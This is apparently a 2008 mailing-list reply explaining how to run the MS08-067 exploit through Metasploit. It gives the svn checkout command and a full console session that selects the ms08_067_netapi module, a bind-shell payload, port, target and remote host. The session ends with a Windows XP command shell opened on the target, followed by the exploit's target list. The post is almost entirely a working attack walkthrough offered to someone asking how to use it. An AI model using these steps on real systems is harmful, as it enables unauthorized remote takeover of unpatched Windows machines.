[Ph4nt0m] Re: MS08-067 Exploit for CN 2k/xp/2003 bypass version

Wed, 29 Oct 2008 19:32:42 -0700 

$ svn co http://metasploit.com/svn/framework3/trunk/ framework-trunk


[EMAIL PROTECTED]:~/exploit/MS08-067/metasploit$
/home/ulises2k/programas/framework-trunk/msfconsole -r ms08-067.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ msf v3.2-testing
+ -- --=[ 304 exploits - 140 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 67 aux

resource> use windows/smb/ms08_067_netapi
resource> set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
resource> set EXITFUNC thread
EXITFUNC => thread
resource> set LPORT 4444
LPORT => 4444
resource> set TARGET 2
TARGET => 2
resource> set SMBPIPE BROWSER
SMBPIPE => BROWSER
resource> set SSL false
SSL => false
resource> set RHOST 172.16.81.131
RHOST => 172.16.81.131
resource> exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL PROTECTED]:
172.16.81.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL 
PROTECTED]:172.16.81.131[\BROWSER]
...
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (172.16.81.1:46832 -> 172.16.81.131:4444)

Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP2 English (DEP)
   1   Windows XP SP3 English (DEP)
   2   Windows XP SP3 Spanish (DEP)
   3   Windows 2003 SP0 English (NO DEP)
   4   Windows 2003 SP2 English (NO DEP)


msf exploit(ms08_067_netapi) >


--
Ulises U. Cuñé
Web: http://www.ulises2k.com.ar


2008/10/29 [EMAIL PROTECTED] <[EMAIL PROTECTED]>

>
> Okie, how do i make it work with metasploit?
> I tried svn update, i tryied to add it manually and i still can't use
> it via metasploit web or console either. :/
>
> Any hints?
>
> Greets,
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复